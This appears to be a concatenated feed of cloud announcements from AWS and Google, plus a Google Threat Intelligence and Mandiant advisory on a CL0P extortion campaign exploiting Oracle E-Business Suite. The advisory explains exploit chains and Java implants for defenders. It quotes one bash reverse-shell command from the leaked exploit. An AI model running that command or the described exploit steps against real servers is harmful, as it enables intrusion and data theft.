Today, we’re announcing the general availability of Amazon Quick Suite—a new set of agentic teammates that helps you get the answers you need using all of your business data and move instantly from insights to action. Quick Suite retrieves insights across the public internet and all your documents, including information in Slack, Salesforce, Snowflake, databases, and other places your company keeps important data. Whether you need a single data point, a PhD-level research project, an entire strategy tailored to your context, or anything in between, Quick Suite quickly gets you all the relevant information.
Quick Suite helps you seamlessly transition from getting answers to taking action in popular applications (like creating or updating Salesforce opportunities, Jira tickets, or ServiceNow incidents). Quick Suite can also help you automate tasks—from routine, daily tasks like responding to RFPs and preparing for customer meetings to automating the most complex business processes such as invoice processing and account reconciliation. All of your data is safe and private. Your queries and data are never used to train models, and you can tailor the Quick Suite experience to you. Your AWS administrator can turn on Quick Suite in only a few steps, and your new agentic teammate will be ready to go. New Quick Suite customers receive a 30-day free trial for up to 25 users.
You can experience the full breadth of Quick Suite capabilities for chat, research, business intelligence, and automation in the following AWS Regions: US East (N. Virginia), US West (Oregon), Asia Pacific (Sydney), and Europe (Ireland)., and we’ll expand availability to additional AWS Regions over the coming months.
To learn more about Quick Suite and its capabilities, read our deep-dive blog.
Today, AWS announced the expansion of 10 Gbps and 100 Gbps dedicated connections with MACsec encryption capabilities at the existing AWS Direct Connect location in the Netrality KC1 data center near Kansas City, MO. You can now establish private, direct network access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones from this location.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
For more information on the over 146 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
AI is presenting a once-in-a-generation opportunity to transform how you work, how you run your business, and what you build for your customers. But the first wave of AI, while promising, has been stuck in silos, unable to orchestrate complex work across an entire organization.
True transformation requires a comprehensive platform that connects to your context, your workflows, and your people. That’s why today, we are proud to introduce Gemini Enterprise: the new front door for AI in the workplace.
Delivering this level of transformation requires a complete, full-stack approach to innovation, and this is where Google leads. Our advantage starts with reliable, purpose-built AI infrastructure, and is powered by the pioneering research of Google DeepMind, and our versatile Gemini family of models. Sundar talks more about our company-wide approach in his blog.
This complete, AI-optimized stack is why nine of the top 10 AI labs and nearly every AI unicorn already use Google Cloud. It’s why 65% of all our customers are using our AI products including: Banco BV, Behr, Box, DBS Bank, Deloitte, Deutsche Telekom, Fairprice Group, the US Department of Energy, and many more around the world. Today, we’re proud to announce more AI wins with Figma, GAP, Gordon Foods, Klarna, Macquarie Bank,Melexis, Mercedes, Signal Iduna, Valiuz, and Virgin Voyages. And we’re excited to be the official Cloud provider of the LA28 Games, where Google Cloud will bring our AI innovations to the Olympic and Paralympic Games.
AI that transforms how you work
Gemini Enterprise brings the best of Google AI to every employee through an intuitive chat interface that acts as a single front door for AI in the workplace. Behind that simple interface, Gemini Enterprise unifies six core components:
The platform is powered by Google’s most advanced Gemini models, creating the brains of the system, providing world-class intelligence for every task.
Through a no-code workbench, any user — from marketing to finance, and any other team — can analyze information and orchestrate agents to automate processes across the organization.
To deliver value from day one, it includes a taskforce of pre-built Google agents for specialized jobs like deep research and data insights, and you can easily augment this with custom agents your teams build or with solutions from our extensive partner ecosystem.
An agent is only as good as its context, so Gemini Enterprise securely connects to your company’s data wherever it lives — from Google Workspace and Microsoft 365 to business applications like Salesforce and SAP.
This is managed with a central governance framework, so you can visualize, secure, and audit all of your agents from one place.
And it is all built on a principle of openness with an ecosystem of over 100,000 partners. This ensures customer choice and fosters innovation.
By bringing all of these components together through a single interface, Gemini Enterprise transforms how teams work. It moves beyond simple tasks to automate entire workflows and drive smarter business outcomes — all on Google’s secure, enterprise-grade architecture.
Some companies offer AI models and toolkits, but they are handing you the pieces, not the platform. They leave your teams to stitch everything together. But you cannot piece together transformation.
That’s exactly what we built with Gemini Enterprise: a complete, AI-optimized platform — from our purpose-built Tensor Processing Units to our world-class Gemini models, all the way to the platform and agents that transform workflows. This is what it takes to deliver a truly unified AI fabric for your business, and it’s why customers are already putting Gemini Enterprise to work:
Banco BV’s relationship managers used to spend hours doing their own analytics. Now, with the help of Gemini Enterprise, it’s done for them, leaving managers with more time to convert new business.
Harvey is the leading domain-specific AI for legal and professional services, trusted by Fortune 500 legal teams. Powered by Gemini, lawyers are more efficient across contract analysis, due diligence, compliance, and litigation, saving hours and hours of time.
This isn’t just about making one task easier. It’s about making entire workflows smarter by searching and finding information from all your enterprise documents, applications, email and chat systems, and automating processes using agents with any of your enterprise applications.
Gemini Enterprise highlights our commitment to an open platform – working seamlessly in Microsoft 365 and Sharepoint environments. And when you use Gemini Enterprise with Google Workspace, you get further benefits. Today, we are announcing the first of many multi-modal agents harnessing the power of Gemini to understand and create text, image, video and speech, built right into the Workspace apps you already use:
Video: With Google Vids, you can now transform one type of information, like a presentation, into a completely different format — an engaging video, complete with an AI-generated script and voiceover. The momentum for Vids has been incredible, with 2.5 million people using it every month.
Voice: In Google Meet, we are bringing real-time speech translation to all business customers. This goes beyond just words, capturing your natural tone and expression to make conversations seamless, no matter what language you speak. This builds on the voice intelligence from our ‘take notes for me’ feature, which has seen usage grow more than 13x since the beginning of the year.
An agent is only as good as its context. Gemini Enterprise integrates with your organization’s data — wherever it lives — to build that context, and deliver relevant, accurate, and trustworthy results. Today, as part of Gemini Enterprise, we are announcing:
A new Data Science Agent, in preview, to automate data wrangling and ingestion. It accelerates detailed data exploration, instantly finding patterns and streamlines complex model development by generating multi-step plans for training and inferencing, eliminating manual, iterative fine-tuning.
Customers like Morrisons, Vodafone, and Walmart are already using this agent to accelerate their data workflows and remove friction from the customer experience.
AI that transforms how you run your business
Customer engagement is one of the most critical use cases for AI adoption and our Customer Engagement Suite – our Conversational AI solution for web, mobile apps, call centers and point of sale – works alongside your customer service reps to answer questions via chat and voice and take actions. The business impact is real, and leading companies are seeing results now:
Commerzbank was an early adopter of Customer Engagement Suite, using it to build Bene, its own specialized chatbot. They are now leveraging Gemini to further enhance the experience, enabling it to handle over two million chats and successfully resolve 70% of all inquiries.
Mercari, Japan’s largest online marketplace, is overhauling its contact center with Google AI to foster an AI-driven customer service experience, which is projected to yield a 500% ROI by reducing customer service rep workloads by at least 20%.
Today, we are announcing true, next-generation conversational agents, in preview, that connect directly into Gemini Enterprise. These provide more value to you in the following ways:
How you build: We are introducing a new, easy-to-use low-code visual builder. You can build a customer engagement agent once, and configure it for all your channels — telephony, web, mobile, email, and chat. These new agents support over 40 languages.
The underlying intelligence: These next-gen agents are powered by our latest Gemini models. This means incredible, natural-sounding voices, with the ability to handle accent transitions and real-world noise from a bad phone connection with industry-leading accuracy and latency.
Your time-to-value: The new AI augmentation services and prebuilt specialized agents allow agents builders to build, test, deploy and monitor agents faster than ever. In addition, we also use AI assisted coaching to vastly increase the productivity of your employees. This makes your entire contact center — both human and digital — more efficient and effective.
Deep enterprise integration. These agents are designed to connect directly into Gemini Enterprise. This unlocks two key advantages: deeper personalization, using real-time context from all your business systems; and unified governance, allowing you to manage all your agents from the same central platform.
AI that transforms what you build
The ultimate transformation is when you use AI to create entirely new experiences for your customers. This starts with empowering the developers who are building your agents and applications. In just three months since launch, over one million developers are already building with Gemini CLI, an AI agent that lets developers interact with Google’s Gemini models directly from a terminal for task automation, code generation, and research using natural language. It has become an essential tool for developers around the world, whose workflows are becoming more complex every day. The best AI shouldn’t force you to switch contexts, it should adapt to your toolchain.
That’s why we introduced Gemini CLI extensions — a new framework to customize your command-line AI and connect it to the services you rely on most. This allows you to build a more intelligent, personalized workflow with a growing ecosystem of extensions from Google, and industry leaders like Atlassian, GitLab, MongoDB, Postman, Shopify, Stripe, and more. It turns your CLI from a simple tool into a personalized command center.
Innovation with agents is leading to an entirely new agent economy, where developers, ISVs and partners can build and earn revenue from specialized agents that communicate and transact with one another. To enable this, we have worked with the industry on an open standard called the Agent2Agent Protocol (A2A), which along with Model Context Protocol (MCP), sets the standard for how agents communicate.
But for agents to be truly autonomous, they must be able to transact. To provide a secure and auditable way for agents to complete payments, last month we announced a new, open protocol: the Agent Payments Protocol (AP2). This is a first-of-its-kind effort, developed with over 100 payment and technology partners, like American Express, Coinbase, Intuit, Mastercard, PayPal, ServiceNow, and Salesforce to establish how agents securely enable financial transactions.
By working with our partners and the larger community to build standardized protocols for key aspects, such as context, communication and commerce, we are laying the foundation for the agent economy.
Our customers are also building our Gemini models directly into their products:
Klarna is using tools like Gemini and Veo to create bespoke lookbooks that are dynamic, personalized and impactful with shoppers, increasing orders by 50%.
Mercedes-Benz builds cars with Google AI that can talk to their drivers. They are using Google Cloud’s Automotive AI Agent, which is built using Gemini on Vertex AI to power their MBUX Virtual Assistant, which enables natural conversations and provides personalized answers to drivers for things like navigation and points of interest.
Swarovski creates personalized customer experience with Vertex AI resulting in a 17% increase in email open rates and 10x faster campaign localization.
This transformation goes beyond code. Our Gemini family of models have been used to create over 13 billion images and 230 million videos. For example:
Figma is helping their community create more than ever. With tools across their platform powered by Gemini’s Flash 2.5 Image model (more commonly known as: Nano Banana), their users can now make high quality, brand-approved images with just a prompt, edit details with AI, and get all the variety their project needs.
Virgin Voyages is using Veo’s “text-to-video” and Imagen to create thousands of hyper-personalized advertisements and emails. Each one perfectly matches Virgin Voyages unique brand voice at a scale that would be impossible just a year ago.
The number of customers using our AI models in Vertex continues to grow, including top brands, like: Adobe, Cathay Pacific, Kraft-Heinz, LATAM Airlines, Toyota, Unilever, and more.
The future of AI must be open
Google Cloud’s AI strategy is built on a foundational belief: The future of AI requires an open, collaborative partner ecosystem to ensure customer choice. To make this real, we have built a comprehensive agentic AI ecosystem with more than 100,000 partners supporting every layer of our AI stack – AI infrastructure, AI tooling, ISVs, and services partners. Today, we are advancing this ecosystem in four critical ways:
Expanded cross-platform workflows: We’re expanding our work with partners like Box, OpenText, ServiceNow, and Workday – tools you use everyday – to enable sophisticated, cross-platform workflows right out of the box.
Scaling with partners: Industry-leading partners, including BCG, Capgemini, HCLTech, Infosys, McKinsey, TCS, Wipro, and many others can assist with planning, deployment, and custom agent development to speed your adoption of Gemini Enterprise. And Accenture, Cognizant, Deloitte, KPMG, and PwC are making announcements today on their internal adoption and expanded services for Gemini Enterprise.
Discover validated agents: Customers can now use a new AI agent finder to discover the right agent for your needs, where you have assurance that the thousands of agents you can now find, filter, and deploy have been reviewed for security and interoperability.
Market & monetize agents: For those partners building AI agents, we provide you with a simple, powerful way to market and earn revenue from your solutions, instantly connecting you with millions of Google Cloud customers.
Enabling your transformation
Delivering this level of transformation requires a commitment to upskilling your teams. So today, we are announcing a comprehensive set of programs to help you succeed.
To upskill your entire workforce, we are introducing Google Skills, our new platform where training from across Google – from Gemini Enterprise to Google Deepmind – is available for free. On this platform, we’re announcing the Gemini Enterprise Agent Ready (GEAR) program, a new educational sprint designed to empower one million developers to build and deploy agents. Click here to be the first to use Google Skills and learn more about GEAR.
For organizations that want our experts embedded side-by-side with your teams, we are proud to announce a new team – Delta – an elite group of Google AI engineers to help you tackle your most complex challenges.
These programs are all designed to do one thing: help you and your teams build your future with AI.
Your foundation for the future
As AI transforms organizations around the world, Google is the only partner with the full set of offerings that you can tailor to your organization’s needs. And most importantly, we are delivering real business value to help you drive ROI from your AI investments.
This is the power of Gemini Enterprise: the new front door for AI in the workplace. We’re bringing the best of Google AI to every employee, for every workflow. And we’re excited to support you every step of the way.
Amazon Web Services (AWS) announces the availability of high performance Storage Optimized Amazon EC2 I7i instances in the AWS Europe (Spain) region. Powered by 5th generation Intel Xeon Scalable processors with an all-core turbo frequency of 3.2 GHz, these new instances deliver up to 23% better compute performance and more than 10% better price performance over previous generation I4i instances. Powered by 3rd generation AWS Nitro SSDs, I7i instances offer up to 45TB of NVMe storage with up to 50% better real-time storage performance, up to 50% lower storage I/O latency, and up to 60% lower storage I/O latency variability compared to I4i instances.
I7i instances offer the best compute and storage performance for x86-based storage optimized instances in Amazon EC2, ideal for I/O intensive and latency-sensitive workloads that demand very high random IOPS performance with real-time latency to access the small to medium size datasets (multi-TBs). Additionally, torn write prevention feature support up to 16KB block sizes, enabling customers to eliminate database performance bottlenecks.
I7i instances are available in eleven sizes – nine virtual sizes up to 48xlarge and two bare metal sizes – delivering up to 100Gbps of network bandwidth and 60Gbps of Amazon Elastic Block Store (EBS) bandwidth. To learn more, visit the I7i instances page.
Written by: Peter Ukhanov, Genevieve Stark, Zander Work, Ashley Pearson, Josh Murchie, Austin Larsen
Introduction
Beginning Sept. 29, 2025, Google Threat Intelligence Group (GTIG) and Mandiant began tracking a new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand. The actor began sending a high volume of emails to executives at numerous organizations, alleging the theft of sensitive data from the victims’ Oracle E-Business Suite (EBS) environments. On Oct. 2, 2025, Oracle reported that the threat actors may have exploited vulnerabilities that were patched in July 2025 and recommended that customers apply the latest critical patch updates. On Oct. 4, 2025, Oracle directed customers to apply emergency patches to address this vulnerability, reiterating their standing recommendation that customers stay current on all Critical Patch Updates.
Our analysis indicates that the CL0P extortion campaign followed months of intrusion activity targeting EBS customer environments. The threat actor(s) exploited what may be CVE-2025-61882 as a zero-day vulnerability against Oracle EBS customers as early as Aug. 9, 2025, weeks before a patch was available, with additional suspicious activity dating back to July 10, 2025. In some cases, the threat actor successfully exfiltrated a significant amount of data from impacted organizations.
This post provides an in-depth analysis of the campaign, deconstructs the multi-stage Java implant framework used by the threat actors to compromise Oracle EBS, details the earlier exploitation activity, and provides actionable guidance and indicators of compromise (IOCs) for defenders.
Background
The CL0P (aka CL0P^_- LEAKS) data leak site (DLS) was established in 2020. Initially, GTIG observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to FIN11. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the mass exploitation of zero-day vulnerabilities in managed file transfer (MFT) systems, including the Accellion legacy file transfer appliance (FTA), GoAnywhere MFT, MOVEit MFT, and Cleo LexiCom. In most of these incidents, the threat actors conducted mass exploitation of zero-day (0-day) vulnerabilities, stole victim data, then initiated extortion attempts several weeks later. While this data theft extortion activity has most frequently been attributed to FIN11 and suspected FIN11 threat clusters, we have also observed evidence that CL0P ransomware and the CL0P DLS are used by at least one threat actor with different tactics, techniques, and procedures (TTPs). This could suggest that FIN11 has expanded their membership or partnerships over time.
This latest campaign targeting Oracle EBS marks a continuation of this successful and high-impact operational model.
Figure 1: Oct. 8 updated CL0P DLS site
Threat Detail
The CL0P Extortion Campaign
Starting Sept. 29, 2025, the threat actor launched a high-volume email campaign from hundreds, if not thousands, of compromised third-party accounts. The credentials for these accounts—which belong to diverse, unrelated organizations—were likely sourced from infostealer malware logs sold on underground forums. This is a common tactic used by threat actors to add legitimacy and bypass spam filters. The emails, sent to company executives, claimed the actor had breached their Oracle EBS application and exfiltrated documents.
Notably, the emails contain two contact addresses, support@pubstorm.com and support@pubstorm.net, that have been listed on the CL0P DLS since at least May 2025. To substantiate their claims, the threat actor has provided legitimate file listings from victim EBS environments to multiple organizations with data dating back to mid-August 2025. The extortion emails have indicated that alleged victims can prevent the release of stolen data in exchange for payment, but the amount and method has not been specified. This is typical of most modern extortion operations, in which the demand is typically provided after the victim contacts the threat actors and indicates that they are authorized to negotiate.
To date, GTIG has not observed victims from this campaign on the CL0P DLS. This is consistent with past campaigns involving the CL0P brand, where actors have typically waited several weeks before posting victim data.
Figure 2: Extortion email sent to victim executives
Technical Analysis: Deconstructing the Exploits
We have identified exploitation activity targeting Oracle E-Business Suite (EBS) servers occurring prior to the recent extortion campaign, likely dating back to July 2025.
Oracle released a patch on Oct. 4 for CVE-2025-61882, which referenced a leaked exploit chain targeting the UiServlet component, but Mandiant has observed multiple different exploit chains involving Oracle EBS and it is likely that a different chain was the basis for the Oct. 2 advisory that originally suggested a known vulnerability was being exploited. It’s currently unclear which specific vulnerabilities/exploit chains correspond to CVE-2025-61882, however, GTIG assesses that Oracle EBS servers updated through the patch released on Oct. 4 are likely no longer vulnerable to known exploitation chains.
July 2025 Activity: Suspicious Activity Involving ‘UiServlet’
Mandiant incident responders identified activity in July 2025 targeting Oracle EBS servers where application logs suggested exploitation targeting /OA_HTML/configurator/UiServlet. The artifacts recovered in Mandiant’s investigations do have some overlap with an exploit leaked in a Telegram group named “SCATTERED LAPSUS$ HUNTERS” on October 3rd, 2025. However, GTIG lacks sufficient evidence to directly correlate activity observed in July 2025 with use of this exploit. At this time, GTIG does not assess that actors associated with UNC6240 (aka “Shiny Hunters”) were involved in this exploitation activity.
The leaked exploit, as analyzed by watchTowr Labs, combines several distinct primitives including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection, to gain remote code execution on the target Oracle EBS server. As mentioned, it’s not clear which CVE corresponds to any of the vulnerabilities exploited in this chain. Any commands executed following exploitation would use sh on Linux, or cmd.exe on Windows.
The leaked exploit archive included sample invocations showing its use for executing a Bash reverse shell, with a command structured like bash -i >& /dev/tcp/<ip>/<port> 0>&1.
Activity Observed Before July 2025 Patch Release
On July 10th, prior to the release of the July 2025 Oracle EBS security updates, Mandiant identified suspicious HTTP traffic from 200.107.207.26. GTIG was unable to confirm the exact nature of this activity, but it’s plausible that this was an early attempt at exploitation of Oracle EBS servers. However, there was no available forensic evidence showing outbound HTTP traffic consistent with the remote XSL payload retrieval performed in the leaked exploit, nor any suspicious commands observed being executed, inhibiting us from assessing that this was an actual exploitation attempt.
Additionally, Internet scan data showed that server exposing a Python AIOHTTP server at approximately the same time as the aforementioned activity, which is consistent with use of the callback server in the publicly leaked exploit.
Activity Observed After July 2025 Patch Release
After the patches were released, Mandiant observed likely exploitation attempts from 161.97.99.49 against Oracle EBS servers, with HTTP requests for /OA_HTML/configurator/UiServlet recorded. Notably, various logs involving EBS indicate that some of these requests timed out, suggesting the SSRF vulnerability present in the leaked public exploit, or follow-on activity that would’ve cleanly closed the request, may have failed. These errors were not observed in the activity recorded prior to the July 2025 patch release.
GTIG is not currently able to confirm if both of these sets of activity were conducted by the same threat actor or not.
August 2025 Activity: Exploit Chain Targeting ‘SyncServlet’
In August 2025, a threat actor began exploiting a vulnerability in the SyncServlet component, allowing for unauthenticated remote code execution. This activity originated from multiple threat actor servers, including 200.107.207.26, as observed in the aforementioned activity.
Exploit Flow: The attack is initiated with a POST request to /OA_HTML/SyncServlet. The actor then uses the XDO Template Manager functionality to create a new, malicious template within the EBS database. The final stage of the exploit is a request that triggers the payload via the Template Preview functionality. A request to the following endpoint is a high-fidelity indicator of compromise:
The malicious payload is stored as a new template in the XDO_TEMPLATES_B database table. The template name (TemplateCode) consistently begins with the prefix TMP or DEF, and the TemplateType is set to XSL-TEXT or XML, respectively. The following is an example of a payload stored in database with the Base64 payload redacted:
Notably, the structure of this XSL payload is identical to the XSL payload in the leaked Oracle EBS exploit previously discussed.
GTIG has identified at least two different chains of Java payloads embedded in the XSL payloads, some of which has also been discussed here:
GOLDVEIN.JAVA – Downloader: A Java variant of GOLDVEIN, a downloader that makes a request back to an attacker-controlled command-and-control (C2 or C&C) IP address to retrieve and execute a second-stage payload. This beacon is disguised as a “TLSv3.1” handshake and contains logging functionality that returns the execution result to the actor in the HTTP response, within an HTML comment. Mandiant hasn’t recovered any follow-on payloads downloaded by GOLDVEIN.JAVA at this time.
GOLDVEIN was originally written in PowerShell and was first observed in the exploitation campaign of multiple Cleo software products in December 2024 by a suspected FIN11 threat cluster tracked as UNC5936.
SAGE* Infection Chain: A nested chain of multiple Java payloads resulting in a persistent filter that monitors for requests to endpoints containing /help/state/content/destination./navId.1/navvSetId.iHelp/ to deploy additional Java payloads.
The XSL payload contains a Base64-encoded SAGEGIFT payload. SAGEGIFT is a custom Java reflective class loader, written for Oracle WebLogic servers.
SAGEGIFT is used to load SAGELEAF, an in-memory dropper based on public code for reflectively loading Oracle WebLogic servlet filters, with additional logging code embedded in it. Logs in SAGELEAF are retrieved by the parent SAGEGIFT payload that loaded it, and they can be returned to the actor in the HTTP response within an HTML comment (structured the same way as GOLDVEIN.JAVA).
SAGELEAF is used to install SAGEWAVE, a malicious Java servlet filter that allows the actor to deploy an AES-encrypted ZIP archive with Java classes in it. Based on our analysis, there is a main payload of SAGEWAVE that may be similar to the Cli module of GOLDTOMB; however, at this time we have not directly observed this final stage.
Mandiant has observed variants of SAGEWAVE where the HTTP header X-ORACLE-DMS-ECID must be set to a specific, hardcoded value for the request payload to be processed, and has also seen different HTTP paths used for request filtering, including /support/state/content/destination./navId.1/navvSetId.iHelp/.
Figure 3: SAGE* infection chain/trigger diagram
Following successful exploitation, the threat actor has been observed executing reconnaissance commands from the EBS account “applmgr.” These commands include:
Furthermore, Mandiant observed the threat actor launching additional bash processes from Java (EBS process running a GOLDVEIN.JAVA second-stage payload) using bash -i and then executing various commands from the newly launched bash process. Child processes of any bash -i process launched by Java running as the EBS account “applmgr” should be reviewed as part of hunting for threat actor commands.
Attribution: Overlaps with Confirmed and Suspected FIN11 Activity
GTIG has not formally attributed this activity to a tracked threat group at this time. The use of the CL0P extortion brand, including contact addresses (support@pubstorm.com and support@pubstorm.net) that have been listed on the CL0P DLS since at least May 2025, is however notable. GTIG initially observed the DLS used for multifaceted extortion operations involving CL0P ransomware and attributed to FIN11. More recently, the majority of the alleged victims appear to be associated with data theft extortion incidents stemming from the exploitation of managed file transfer (MFT) systems frequently attributed to FIN11 and suspected FIN11 threat clusters. However, we have also observed evidence that CL0P ransomware, and the CL0P DLS has not been exclusively used by FIN11, precluding our ability to attribute based only on this factor.
In addition to the CL0P overlap, the post-exploitation tooling shows logical similarities to malware previously used in a suspected FIN11 campaign. Specifically, the use of the in-memory Java-based loader GOLDVEIN.JAVA that fetches a second-stage payload is reminiscent of the GOLDVEIN downloader and GOLDTOMB backdoor, which were deployed by the suspected FIN11 cluster UNC5936 during the mass exploitation of the Cleo MFT vulnerability in late 2024. Further, one of the compromised accounts used to send the recent extortion emails was previously used by FIN11. Ongoing analysis may reveal more details about the relationship between this recent activity and other threat clusters—such as FIN11 and UNC5936.
Implications
The pattern of exploiting a zero-day vulnerability in a widely used enterprise application, followed by a large-scale, branded extortion campaign weeks later, is a hallmark of activity historically attributed to FIN11 that has strategic benefits which may also appeal to other threat actors. Targeting public-facing applications and appliances that store sensitive data likely increases the efficiency of data theft operations, given that the threat actors do not need to dedicate time and resources to lateral movement. This overall approach—in which threat actors have leveraged zero-day vulnerabilities, limited their network footprint, and delayed extortion notifications—almost certainly increases the overall impact, given that threat actors may be able to exfiltrate data from numerous organizations without alerting defenders to their presence. CL0P-affiliated actors almost certainly perceive these mass exploitation campaigns as successful, given that they’ve employed this approach since at least late 2020. We therefore anticipate that they will continue to dedicate resources to acquiring zero-day exploits for similar applications for at least the near-term.
Recommendations
GTIG and Mandiant recommend the following actions to mitigate and detect the threats posed by this activity and harden Oracle E-Business Suite environments:
Apply emergency patches immediately: Prioritize the application of the Oracle EBS patches released on Oct. 4, 2025, which mitigate the described exploitation activity (CVE-2025-61882). Given the active, in-the-wild exploitation, this is the most critical step to prevent initial access.
Hunt for malicious templates in the database: The threat actor(s) store payloads directly in the EBS database. Administrators should immediately query the XDO_TEMPLATES_B and XDO_LOBS tables to identify malicious templates. Review any templates where the TEMPLATE_CODE begins with TMP or DEF. The payload is stored in the LOB_CODE column.
SELECT * FROM XDO_TEMPLATES_B ORDER BY CREATION_DATE DESC;
SELECT * FROM XDO_LOBS ORDER BY CREATION_DATE DESC;
Restrict outbound internet access: The observed Java payloads require outbound connections to C2 servers to fetch second-stage implants or exfiltrate data. Block all non-essential outbound traffic from EBS servers to the internet. This is a compensating control that can disrupt the attack chain even if a server is compromised.
Monitor and analyze network logs: Monitor for indicators of compromise. A request to the TemplatePreviewPG endpoint containing a TemplateCode prefixed with TMP or DEF is a strong indicator of an exploitation attempt. Additionally, investigate anomalous requests to /OA_HTML/configurator/UiServlet and /OA_HTML/SyncServlet.
Leverage memory forensics: The implants used in this campaign are primarily Java-based and execute in memory. If a compromise is suspected, memory analysis of the Java processes associated with the EBS application may reveal malicious code or artifacts not present on disk.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) M6in and M6idn instances are available in AWS Asia Pacific (Seoul) region. These sixth-generation network optimized instances, powered by 3rd Generation Intel Xeon Scalable processors and built on the AWS Nitro System, deliver up to 200Gbps network bandwidth, for 2x more network bandwidth over comparable fifth-generation instances. Customers can use M6in and M6idn instances to scale their performance and throughput of network-intensive workloads such as high-performance file systems, distributed web scale in-memory caches, caching fleets, real-time big data analytics, and Telco applications such as 5G User Plane Function.
M6in and M6idn instances are available in 10 different instance sizes including metal, offering up to 128 vCPUs and 512 GiB of memory. They deliver up to 100Gbps of Amazon Elastic Block Store (EBS) bandwidth, and up to 400K IOPS. M6in and M6idn instances offer Elastic Fabric Adapter (EFA) networking support on 32xlarge and metal sizes. M6idn instances offer up to 7.6 TB of high-speed, low-latency instance storage.
With this regional expansion, M6in and M6idn instances are available in the following AWS Regions: US East (Ohio, N. Virginia), US West (N. California, Oregon), Europe (Ireland, Frankfurt, Spain, Stockholm, Zurich), Asia Pacific (Mumbai, Singapore, Tokyo, Sydney, Seoul), Canada (Central), and AWS GovCloud (US-West). Customers can purchase the new instances through Savings Plans, On-Demand, and Spot instances. To learn more, see M6in and M6idn instances page.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C6in instances are available in AWS Region Mexico (Central). These sixth-generation network optimized instances, powered by 3rd Generation Intel Xeon Scalable processors and built on the AWS Nitro System, deliver up to 200Gbps network bandwidth, for 2x more network bandwidth over comparable fifth-generation instances.
Customers can use C6in instances to scale the performance of applications such as network virtual appliances (firewalls, virtual routers, load balancers), Telco 5G User Plane Function (UPF), data analytics, high performance computing (HPC), and CPU based AI/ML workloads. C6in instances are available in 10 different sizes with up to 128 vCPUs, including bare metal size. Amazon EC2 sixth-generation x86-based network optimized EC2 instances deliver up to 100Gbps of Amazon Elastic Block Store (Amazon EBS) bandwidth, and up to 400K IOPS. C6in instances offer Elastic Fabric Adapter (EFA) networking support on 32xlarge and metal sizes.
C6in instances are available in these AWS Regions: US East (Ohio, N. Virginia), US West (N. California, Oregon), Europe (Frankfurt, Ireland, London, Milan, Paris, Spain, Stockholm, Zurich), Middle East (Bahrain, UAE), Israel (Tel Aviv), Asia Pacific (Hong Kong, Hyderabad, Jakarta, Malaysia, Melbourne, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo, Thailand), Africa (Cape Town), South America (Sao Paulo), Canada (Central), Canada West (Calgary), AWS GovCloud (US-West, US-East), and Mexico (Central). To learn more, see the Amazon EC2 C6in instances. To get started, see the AWS Management Console, AWS Command Line Interface (AWS CLI), and AWS SDKs.
Amazon DynamoDB now offers customers the option to use Internet Protocol version 6 (IPv6) addresses in their Amazon Virtual Private Cloud (VPC) when connecting to DynamoDB tables, streams, and DynamoDB Accelerator (DAX), including with AWS PrivateLink Gateway and Interface endpoints. Customers moving to IPv6 can simplify their network stack and meet compliance requirements by using a network that supports both IPv4 and IPv6.
The continued growth of the internet is exhausting available Internet Protocol version 4 (IPv4) addresses. IPv6 increases the number of available addresses by several orders of magnitude and customers no longer need to manage overlapping address spaces in their VPCs. Customers can standardize their applications on the new version of Internet Protocol by moving to IPv6 with a few clicks in the AWS Management Console.
Support for IPv6 in Amazon DynamoDB is now available in all commercial AWS Regions in the United States and the AWS GovCloud (US) Regions. It will deploy to the remaining global AWS Regions where Amazon DynamoDB is available over the next few weeks.
From the classroom to the boardroom, the world of work is shifting at an incredible pace. As advancements in AI and cloud computing gather speed, it’s not just about adapting — it’s about discovering powerful new ways to thrive, regardless of your role.
To help everyone keep up, we’re announcing three major updates to our learning programs, timed with the launch today of Gemini Enterprise.
A new platform, Google Skills, that will bring together nearly 3,000 courses and labs in one place — including content from across Google Cloud, Google DeepMind, Grow with Google and Google for Education.
A new initiative, the Gemini Enterprise Agent Ready (GEAR) program, aims to empower one million developers to start building enterprise-ready AI agents with our new Gemini Enterprise platform.
With these updates, we’re delivering on our commitment to help everyone access the AI learning they need — including our Google Cloud customers in search of skilled developers.
What’s new for Google Cloud learners, customers and partners on Google Skills?
To support people at all skill levels — from students to developers to executives — we’re introducing Google Skills. This new learning platform is designed to help people develop the skills they need to be successful in today’s job landscape, and to enable businesses to find and develop the talent they need to thrive. In the last year alone, people have completed more than 26 million courses, labs and credentials — and now they’re all in one place.
In addition to content from across Google — like new AI research courses from Google DeepMind — this launch brings with it a host of new content for our Cloud customers to keep them on the cutting edge of AI skill building:
1. Gemini Code Assist: AI-powered learning and new skill badges
Gemini Code Assist will help engineers, developers, data scientists and more jump right into coding with Gemini without leaving the Google Skills platform. It’s been enabled in more than 20 hands-on labs and will be part of all relevant labs going forward. And developers can also prove Gemini Code Assist skills by earning a new skill badge: Kickstarting Application Development with Gemini Code Assist.
We’re also meeting the vibe-coding moment with two new skill badges for app devs: Building a Smart Cloud Application with Vibe Coding & MCP establishes foundational knowledge and practical skills in Model Context Protocol server development and vibe coding on Google Cloud. Deploy an Agent with Agent Development Kit empowers devs to build advanced AI systems where different AI parts work together smoothly, using common methods like the Model Context Protocol, Agent-to-Agent protocol and Agent Development Kit.
A better experience for Google Cloud customers and organizations
You asked. We listened. As part of Google Skills, we’ve kept the best of Google Cloud Skills Boost, while adding features you’ve been waiting for on the all-new Google Skills platform. For example, Cloud customers will continue to have access to the entire Google Cloud content library for free, now including new content from Google DeepMind.
We’ve also added a new feature that lets you assign the most relevant courses and hands-on labs to your teams. This personalization benefits your business and accelerates your team’s ability to innovate.
Plus, you can now use company leaderboards — customized for your organization — that spark friendly competition and add a dose of fun. And finally, for Google Skills admins, we’ll be adding features to make reporting more advanced. That means more data, more flexibility and more insights that let you keep track of your team’s progress in real time.
Cloud learning has never been more fun: new gamified features
